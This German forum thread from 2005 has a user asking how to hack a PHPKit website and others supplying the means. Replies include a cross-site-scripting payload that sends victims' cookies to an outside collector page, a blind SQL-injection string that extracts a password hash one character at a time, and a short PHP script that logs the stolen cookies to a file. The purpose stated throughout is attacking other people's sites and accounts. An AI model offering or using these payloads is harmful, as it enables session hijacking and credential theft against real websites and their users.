[Suche] Wie exploite ich ein PHPKit ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von HaCkKiddiE, 18. August 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 18. August 2005
    Hi

    Ich suche n Tutorial wie man nem PHPKIT exploitet (hackt)

    Danke
     
  2. 18. August 2005
    so wie du das schreibst willst du ein explitet hacken ? was hat das für ein sinn ?
     
  3. 18. August 2005
    ^^ hat recht
    ein exploit ist nur ein fehler in der software/programm
    erst durch diesen fehler hat man eine angriffsfläche und kann einen hackversuch internehmen

    es gibt im netz genug seiten die exploits auflisten musst nur nach deiner version suchen und schauen ob sie mit der zuhackenden version übereinstimmt und hoffen dass sie noch nicht geupdated wurde
     
  4. 18. August 2005
    ja und wenn ich dann die exploits habe....

    wie hacke ich dann sowas ?
    z.B:
    Code:
    www.target.de/popup.php?img="><script>alert(document.cookie)</script>
     
  5. 18. August 2005
    Hierbei handelt es sich um XSS oder auch Cross-Site-Scripting genannt.

    Du musst anstelle von <script>alert(document.cookie)</script> ein Script einfügen welches die Cookies der Benutzer stielt und dann dein Opfer dazu bringen dass es den Link verwendet.
     
  6. 19. August 2005
    und was muss ich da jetzt genau eingeben ?



    Und wie siehsts mit dieser Methode aus ?

    Code:
    phpkit/include.php?path=guestbook/print.php&id=1
     
  7. 19. August 2005
    Code:
    www.target.de/popup.php?img="><img width=0 height=0 src="javascript:document.images[0].src='http://meineseite.de/cookiedieb.php?cookie=' document.cookie">
    
    1. du hast etwas vergessen:

    phpkit/include.php?path=guestbook/print.php&id=1'

    phpkit/include.php?path=guestbook/print.php&id=1' OR (userid=1 AND ascii(substring(password,$i,1))=$num)/*

    und so per SQL-Injection sich die einzelnen Zeichen des PW-Hashes ausgeben lassen.
     
  8. 19. August 2005
    Code:
    phpkit/include.php?path=guestbook/print.php&id=1'
    aber wenn ich das einfüge sehe ich nur einen leeren gästebuch eintrag ?

    ---------------------------------------------------------------------------------------------------




    Code:
    phpkit/include.php?path=guestbook/print.php&id=1' OR (userid=1 AND ascii(substring(password,$i,1))=$num)/*
    und wie genau soll das hier funktionieren ?

    PS: Danke schonmal..xodox..
    hast n 10ner



    -----------------------------------------------------------------------------------------------------

    Code:
    popup.php?img="><img width=0 height=0 src="javascript:document.images[0].src='http://meineseite.de/cookiedieb.php?cookie=' document.cookie">
    wie müsste dann die cookiediep.php aussehen ?
     
  9. 19. August 2005
    Alles werde ich sicher nicht verraten..

    Suchfunktion: sql-injection wirst einige tutorials finden.
     
  10. 20. August 2005
    Benutzer ruft den link auf => Browser versucht das Bild zu laden und hängt an die Anfrage den Cookie an, welchen du dann mittels z.B.

    Code:
    <?
    error_reporting
    (E_ALL ^ E_NOTICE);
    $cookie = $_REQUEST[cookie];
    $fic=fopen("cookies.txt", "a");
    fwrite($fic, "$cookie\n");
    fclose($fic);
    ?>
    
    abfangen kannst.
     
  11. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.